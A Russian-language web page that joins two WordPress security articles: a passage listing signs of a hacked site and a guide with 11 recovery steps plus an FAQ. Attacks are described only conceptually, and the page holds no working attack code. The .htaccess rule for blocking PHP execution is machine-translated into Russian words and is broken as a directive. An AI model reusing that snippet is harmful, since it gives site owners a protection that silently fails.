    Чтобы найти файлы, необходимо подключиться к сайту WordPress с помощью FTP-клиента. Наиболее распространенным местом, где вы найдете вредоносные файлы и скрипты, является папка /wp-content/.

    Обычно эти файлы называются так же, как файлы WordPress, чтобы их можно было скрыть на виду. Чтобы распознать их самостоятельно, вам необходимо проверить структуру файлов и каталогов. Однако удаление этих файлов не гарантирует, что они не вернутся.

    7. Ваш сайт часто работает медленно или не отвечает

    Все веб-сайты в Интернете могут стать целью случайного отказа в обслуживании или DDoS-атак. В этих атаках используется несколько взломанных компьютеров и серверов со всего мира с использованием поддельных IP-адресов.

    Иногда они просто отправляют слишком много запросов на ваш сервер, а иногда активно пытаются проникнуть на ваш сайт.

    Любая такая активность сделает ваш сайт медленным, неотзывчивым и недоступным. Вы можете проверить журналы своего сервера, чтобы увидеть, какие IP-адреса делают слишком много запросов, и заблокировать их, но это может не решить проблему, если их слишком много или хакеры меняют IP-адреса.

    Также возможно, что ваш сайт WordPress работает медленно и не взломан. В этом случае вам следует следовать нашему руководству, чтобы повысить скорость и производительность WordPress.

    8. Необычная активность в журналах сервера

    Журналы сервера представляют собой текстовые файлы, хранящиеся на вашем веб-сервере. Эти файлы хранят записи обо всех ошибках, возникающих на вашем сервере, а также обо всем вашем интернет-трафике.

    Вы можете получить к ним доступ из панели инструментов cPanel вашей учетной записи хостинга WordPress в разделе Статистика.

    Эти журналы сервера могут помочь вам понять, что происходит, когда ваш сайт WordPress подвергается атаке.

    Они также содержат все IP-адреса, используемые для доступа к вашему веб-сайту, поэтому вы можете заблокировать подозрительные IP-адреса.

    Они также будут указывать на ошибки сервера, которые вы можете не видеть в своей панели управления WordPress и которые могут вызывать сбой вашего сайта или его зависание.

    9. Невозможность отправки или получения электронных писем WordPress

    Взломанные серверы обычно используются для рассылки спама. Большинство хостинговых компаний WordPress предлагают бесплатные учетные записи электронной почты на вашем хостинге. Многие владельцы сайтов WordPress используют почтовые серверы своего хоста для отправки электронных писем WordPress.

    Если вы не можете отправлять или получать электронные письма WordPress, есть вероятность, что ваш почтовый сервер взломан для рассылки спама.

    10. Подозрительные запланированные задачи

    Веб-серверы позволяют пользователям настраивать задания cron. Это запланированные задачи, которые вы можете добавить на свой сервер. Сам WordPress использует cron для настройки запланированных задач, таких как публикация запланированных сообщений, удаление старых комментариев из корзины и т. д.

    Хакер может использовать задания cron для запуска запланированных задач на вашем сервере без вашего ведома.

    Чтобы узнать больше о заданиях cron, ознакомьтесь с нашим руководством по просмотру и управлению заданиями cron в WordPress.

    11.
    Захваченные результаты поиска

    Если результаты поиска на вашем сайте показывают неверные заголовки или метаописания, то это признак того, что ваш сайт WordPress взломан.

    Глядя на свой сайт WordPress, вы все равно увидите правильный заголовок и описание.

    Хакер снова использовал бэкдор для внедрения вредоносного кода, который изменяет данные вашего сайта таким образом, что они видны только поисковым системам.

    12. Всплывающие окна или всплывающие окна под рекламой на вашем веб-сайте

    Взломщики такого типа пытаются заработать деньги, перехватывая трафик вашего веб-сайта и показывая им собственную спам-рекламу.

    Эти всплывающие окна не отображаются для вошедших в систему посетителей или посетителей, заходящих на веб-сайт напрямую.

    Они видны только пользователям, зашедшим из поисковых систем. Всплывающие объявления открываются в новом окне и остаются незаметными для пользователей.

    13. Основные файлы WordPress изменены

    Если ваши основные файлы WordPress изменены или изменены каким-либо образом, то это важный признак того, что ваш сайт WordPress взломан.

    Хакеры могут просто изменить основной файл WordPress и поместить в него свой собственный код. Они также могут создавать файлы с именами, похожими на основные файлы WordPress.

    Самый простой способ отслеживать эти файлы — установить плагин безопасности WordPress, который отслеживает состояние ваших основных файлов WordPress. Вы также можете вручную проверить папки WordPress на наличие подозрительных файлов или скриптов.

    14. Пользователи случайным образом перенаправляются на неизвестные веб-сайты

    Если ваш веб-сайт перенаправляет посетителей на неизвестный веб-сайт, это еще один важный признак того, что ваш веб-сайт может быть взломан.

    Этот взлом часто остается незамеченным, поскольку он не перенаправляет зарегистрированных пользователей. Он также может не перенаправлять посетителей, обращающихся к веб-сайту напрямую, путем ввода адреса в браузере.

    Взломы такого типа часто вызываются бэкдором или вредоносным ПО, установленным на вашем веб-сайте.

    Защита и исправление вашего взломанного сайта WordPress

    Очистка взломанного сайта WordPress может быть невероятно болезненной и сложной. Вот почему мы рекомендуем вам поручить специалистам очистить ваш сайт.

    Мы используем Sucuri для защиты всех наших веб-сайтов. Узнайте, как Sucuri помогла нам заблокировать 450 000 атак на WordPress за 3 месяца.

    Он поставляется с круглосуточным мониторингом веб-сайтов и мощным брандмауэром приложений для веб-сайтов, который блокирует атаки еще до того, как они достигнут вашего веб-сайта. Самое главное, они очищают ваш сайт, если он когда-либо будет взломан.

    Если вы хотите очистить свой сайт самостоятельно, ознакомьтесь с нашим руководством для начинающих по исправлению взломанного сайта WordPress.

    Защита вашего веб-сайта WordPress от атак в будущем

    Как только ваш веб-сайт будет очищен, вы можете обезопасить его, затруднив доступ хакеров к вашему веб-сайту.

    Обеспечение безопасности веб-сайта WordPress включает в себя добавление уровней защиты вокруг вашего веб-сайта. Например, использование надежных паролей с двухэтапной проверкой может защитить вашу административную область WordPress от несанкционированного входа в систему.

    Точно так же вы можете заблокировать доступ к важным файлам WordPress, чтобы защитить их или правильно установить права доступа к файлам и папкам WordPress.

    Для получения более подробной информации см. наше окончательное руководство по безопасности WordPress, которое проведет вас через все шаги, которые необходимо предпринять для обеспечения безопасности вашего сайта WordPress.

    Мы надеемся, что эта статья помогла вам узнать, какие признаки следует искать на взломанном сайте WordPress.

    Вы также можете ознакомиться с нашим руководством по получению бесплатного SSL-сертификата или нашим экспертным сравнением лучших услуг телефонной связи для малого бизнеса.

    Если вам понравилась эта статья, подпишитесь на наш YouTube-канал для видеоуроков по WordPress. Вы также можете найти нас в Твиттере и Facebook.

    Признаки и способы восстановления после них

    Вордпресс Устранение неполадок

    01 сентября 2022 г.

    Jordana A.

    7min Read

    Ежедневно происходит более 2200 кибератак, что соответствует более чем 800 000 человек, которые становятся их жертвами в год. С таким количеством киберугроз, вырисовывающихся в Интернете, есть шанс, что одна из них проникнет на ваш сайт WordPress.

    Однако не стоит паниковать, если ваш сайт WordPress был взломан. В этой статье мы рассмотрим 11 шагов, чтобы восстановить ваш сайт и предотвратить будущие взломы.

    Давайте начнем с выяснения, является ли проблема взломом WordPress.

    Загрузить контрольный список безопасности WordPress

    Не всегда легко диагностировать взломанный веб-сайт. Проверьте наличие следующих признаков, чтобы понять, был ли взломан ваш сайт:

    • Вы не можете войти в панель администратора WordPress.
    • Вы не загрузили контент и дизайн.
    • Внезапное падение трафика.
    • Сайт перенаправляет пользователей и рассылает спам.
    • Предупреждения черного списка браузера появляются при посещении вашего веб-сайта WordPress.
    • Ваши файлы WordPress отсутствуют.
    • Журналы сервера обнаруживают необычные действия и посещения из неизвестных мест.
    • Новый участник с правами администратора был добавлен без вашего согласия.
    • Ваш подключаемый модуль безопасности предупреждает вас о возможном взломе.

    Как взламывают сайт WordPress

    Вот некоторые из наиболее распространенных кибератак, которые могут использовать уязвимости системы безопасности WordPress:

    • Бэкдоры ‒ вредоносное ПО, которое сводит на нет процедуры аутентификации для доступа к файлам ядра WordPress.
    • Атаки грубой силы ‒ метод взлома, использующий стратегию проб и ошибок для угадывания ваших учетных данных для входа.
    • Межсайтовый скриптинг (XSS) ‒ атака путем внедрения кода, которая запускает вредоносные скрипты в код веб-сайта.
    • Атаки с внедрением SQL ‒ метод взлома, включающий внедрение кода, нацеленного на уязвимые SQL-запросы.
    • Вредоносная переадресация ‒ бэкдор, перенаправляющий посетителей вашего сайта на подозрительный сайт.
    • Pharma hacks ‒ SEO-спам-атака, которая заражает ваш сайт вредоносным контентом. В результате ваш веб-сайт начнет ранжироваться по этим спам-ключевым словам, что нанесет ущерб репутации вашего бренда.
    • Отказ в обслуживании (DoS) ‒ атака, предназначенная для отключения веб-сайта или сети путем перегрузки целевой системы запросами.

    Причины взлома сайта WordPress 

    Вы можете задаться вопросом, почему ваш сайт был взломан. Вот три основные причины, по которым хакеры могут рассматривать ваш сайт WordPress как главную цель для своих кибератак.

    Небезопасные учетные данные для входа

    8% зараженных веб-сайтов WordPress имеют слабые пароли, такие как «12345», «picture1» и «password». Хотя надежный пароль не гарантирует защиты от взлома, безопасные учетные данные для входа добавляют еще один уровень безопасности вашему веб-сайту и личной информации.

    Устаревшее программное обеспечение

    Устаревшие основные файлы, плагины и темы WordPress являются одной из наиболее распространенных причин взлома веб-сайтов. Поддержание ваших установок WordPress в актуальном состоянии имеет важное значение, поскольку обновления программного обеспечения поставляются с исправлениями безопасности, которые устраняют уязвимости предыдущей версии. Без обновлений хакеры могут использовать эти уязвимости для доступа к вашему сайту WordPress.

    Плохой код веб-сайта 

    Некачественные плагины и темы WordPress, как правило, имеют плохой код, что создает уязвимости на вашем сайте WordPress. Поэтому мы рекомендуем получать ваши темы и плагины из официального репозитория WordPress или авторитетных торговых площадок, которые обеспечивают регулярные обновления и поддержку.

    11 решений для исправления взломанного веб-сайта WordPress

    После подтверждения того, что ваш сайт WordPress взломан, пришло время исправить проблему. В следующем разделе мы объясним, как очистить взломанный сайт WordPress за 11 простых шагов.

    1. Переведите WordPress в режим обслуживания

    Если у вас все еще есть доступ к панели инструментов WordPress, немедленно переведите свой веб-сайт в режим обслуживания. Это не позволит посетителям открыть ваш взломанный сайт WordPress, защитив их личную информацию и устройство от любых атак. Вы также сохраните доверие к своему бренду, не позволяя взломанному сайту WordPress работать.

    Пользователи Hostinger могут включить режим обслуживания через свою панель управления hPanel. Вам нужно всего лишь перейти к Dashboard в разделе WordPress панели hPanel и нажать на опцию Maintenance mode .

    Pro Tip

    Ознакомьтесь с нашей статьей о режиме обслуживания WordPress, чтобы узнать о различных способах его включения.

    2. Сброс пароля WordPress

    Если хакеры получат доступ к вашему сайту, ваши учетные данные для входа будут скомпрометированы. Поэтому лучший первый шаг для исправления вашего взломанного сайта — сбросить пароли администратора WordPress, FTP, базы данных и учетной записи хостинга.

    Многие инструменты управления паролями, такие как NordPass, предлагают генератор, который вы можете использовать для создания надежных паролей и обеспечения их безопасности для вас. Идеальный пароль должен содержать не менее 16 символов, включая буквы, цифры и символы.

    Мы также рекомендуем включить двухфакторную аутентификацию и ограничить попытки входа в систему, чтобы добавить дополнительные уровни защиты к вашим учетным данным для входа в WordPress.

    3. Обновите WordPress

    Прежде чем пытаться исправить взломанный веб-сайт, лучше всего обновить старые установки WordPress. Это поможет помешать хакерам воспользоваться уязвимостями сайта, чтобы отменить исправление, и сохранить ваш сайт в безопасности после взлома.

    Pro Tip

    Ознакомьтесь с нашей статьей об обновлении WordPress, если вам нужна помощь. Мы также рекомендуем обновить ваши темы и плагины, поскольку кибератаки обычно проникают в WordPress через устаревшие плагины и файлы тем.

    4. Деактивация плагинов и тем

    Деактивация ваших плагинов и тем, а затем их повторная активация по одному позволяет сузить число зараженных установок. Как только вы обнаружите ошибочные установки, деактивируйте и удалите их.

    Это также идеальное время для удаления неиспользуемых установок WordPress с вашего сайта. Наличие ненужных тем и плагинов, установленных на вашем сайте, может создать точки доступа для вредоносных программ для взлома WordPress, даже если они неактивны.

    Кроме того, удалите все плагины и темы, полученные за пределами официальных каталогов тем и плагинов WordPress, поскольку эти типы программного обеспечения имеют более высокий риск наличия вредоносного кода.

    Вот шаги для отключения плагина:

    1. Перейдите к Плагин -> Установленные плагины из панели администратора WP.
    2. Чтобы деактивировать один плагин, нажмите на опцию Деактивировать под ним.
    1. Чтобы деактивировать сразу несколько плагинов, установите флажок рядом с выбранными и выберите Деактивировать из выпадающего меню. Щелкните Применить .

    5. Переустановите WordPress

    Если ни один из предыдущих шагов не работает, ваши файлы ядра WordPress могут быть заражены. В этом случае вам придется переустановить файлы ядра и начать заново.

    Проще всего это сделать через панель администратора WordPress. Перейдите на панель инструментов -> Обновления и нажмите кнопку Переустановить .

    Перед началом новой установки WordPress обязательно сделайте резервную копию файлов вашего веб-сайта. Не перезаписывайте старую версию резервной копии сайта новой. Позже вы сможете сравнить взломанные системные файлы WordPress с чистой версией, чтобы идентифицировать и удалить подозрительные файлы.

    Pro Tip

    Прочтите нашу статью о переустановке WordPress, чтобы узнать больше о других методах.

    6. Удаление новых пользователей WordPress с правами администратора

    Одним из наиболее распространенных признаков взлома сайтов WordPress является появление новых пользователей с правами администратора. Если вы видите какие-либо недавно добавленные учетные записи администратора, которые вы или другие администраторы веб-сайта не распознаете, немедленно удалите их.

    Совет профессионала

    Обратитесь к нашей статье об управлении ролями пользователей WordPress, чтобы узнать, как удалить учетные записи пользователей с вашего сайта.

    7. Поиск вредоносных программ

    Существует два способа удаления вредоносных программ со взломанных веб-сайтов WordPress — вручную или с помощью плагина для удаления вредоносных программ. Мы рекомендуем выбрать последнее, так как неправильное выполнение ручного процесса может ухудшить ситуацию.

    Следите за нашей статьей об удалении вредоносных программ WordPress обоими методами. В статье также представлены лучшие плагины безопасности WordPress с функциями удаления вредоносных программ.

    8. Отключить выполнение PHP

    Хакеры могут создавать бэкдоры на сайтах WordPress, загружая файлы с вредоносным кодом в папку Uploads . Отключение выполнения PHP не позволяет им выполнять эти зараженные файлы.

    Сначала создайте файл .htaccess и добавьте в него следующий код:

     
    отрицать от всех
     

    Затем загрузите файл .htaccess в папку wp-content/uploads/ внутри вашего корневого каталога либо с помощью FTP-клиента, либо с помощью файлового менеджера.

    9. Очистите базу данных WordPress

    После очистки ваших установок WordPress следующим шагом будет просмотр записей в вашей базе данных. Удалите все записи, содержащие вредоносный код, и новые записи, которые вы не узнаете, чтобы хакеры не могли создавать бэкдоры посредством внедрения в базу данных.

    Обратите внимание, что выполнение этого процесса вручную рискованно и требует много времени, особенно если у вас много записей. Сайт также может выйти из строя, если вы случайно удалите неправильные записи.

    По этой причине мы рекомендуем выбрать один из лучших плагинов базы данных WordPress для этого процесса.

    10. Очистите карту сайта WordPress

    Карта сайта — это план, который помогает поисковым системам находить и сканировать содержимое вашего веб-сайта. Если его взломают, ваш рейтинг в поисковых системах, скорее всего, упадет. Вот почему стоит регенерировать новую карту сайта при атаках вредоносных программ WordPress.

    Самый простой способ создать карту сайта WordPress — использовать плагин WordPress. После этого отправьте новую карту сайта в Google для сканирования через Google Search Console. Имейте в виду, что поисковой системе может потребоваться до двух недель, чтобы просканировать ваш сайт.

    11. Свяжитесь с вашим хостинг-провайдером

    Если ваш веб-сайт работает на виртуальном хостинге, есть вероятность, что проблема возникает с другого сайта на том же веб-сервере. Свяжитесь с вашим хостинг-провайдером, чтобы проверить, затрагивают ли проблемы безопасности не только ваш сайт.

    По крайней мере, ваша хостинговая компания должна иметь возможность восстановить доступ к вашему сайту WordPress или предоставить веб-журналы, чтобы сократить время взлома.

    Хостинг-провайдер играет важную роль в обеспечении производительности и безопасности веб-сайта на самом высоком уровне. Если вы не думаете, что ваш текущий веб-хостинг может смягчить атаки взлома WordPress, пришло время искать новый.

    Рассмотрите возможность получения управляемого хостинга WordPress, поскольку он обычно предлагает меры безопасности, созданные специально для защиты файлов и установок веб-сайта WordPress.

    Заключение

    Взлом вашего сайта WordPress — это стресс. Тем не менее, лучше всего перенаправить свою энергию на уменьшение ущерба и принять меры для восстановления вашего сайта WordPress.

    Вот краткий обзор:

    1. Переведите взломанный сайт WordPress в режим обслуживания.
    2. Сбросьте пароль.
    3. Обновите свой сайт WordPress.
    4. Деактивировать плагины и темы.
    5. Переустановите программное обеспечение WordPress.
    6. Удалить пользователей WordPress с правами администратора.
    7. Поиск вредоносных программ.
    8. Отключить выполнение PHP.
    9. Очистить базу данных WordPress.
    10. Очистить карту сайта WordPress.
    11. Обратитесь к своему хостинг-провайдеру.

    Мы надеемся, что эта статья помогла вам восстановить ваш сайт WordPress и свести к минимуму нанесенный ему ущерб. Удачи!

    Часто задаваемые вопросы о взломанном WordPress

    Легко ли взломать WordPress?

    Поскольку WordPress является самой популярной системой управления контентом (CMS), веб-сайты, созданные с помощью этой CMS, являются популярной мишенью для кибератак. Однако 61% зараженных сайтов WordPress были устаревшими, то есть на них не было последних обновлений безопасности для устранения уязвимостей.

    Как защитить сайт WordPress без плагинов?

    Защитите сайт WordPress:
    1. Используйте надежные пароли
    2. Ограничьте количество попыток входа в систему
    4. Измените префикс таблицы базы данных
    4. Выберите надежного хостинг-провайдера.

    Хотя вы можете защитить свой сайт без плагина безопасности, его установка даст вам инструменты для резервного копирования встроенных мер безопасности WordPress.

    Какая CMS самая безопасная?

    Drupal — одна из самых популярных и безопасных CMS на сегодняшний день. Программное обеспечение CMS оптимизирует большинство своих встроенных функций для повышения производительности и безопасности и регулярно проводит тесты безопасности. Однако, поскольку Drupal в основном предназначен для веб-разработчиков, у него более крутая кривая обучения, чем у WordPress.

Добавить комментарий

Ваш адрес email не будет опубликован.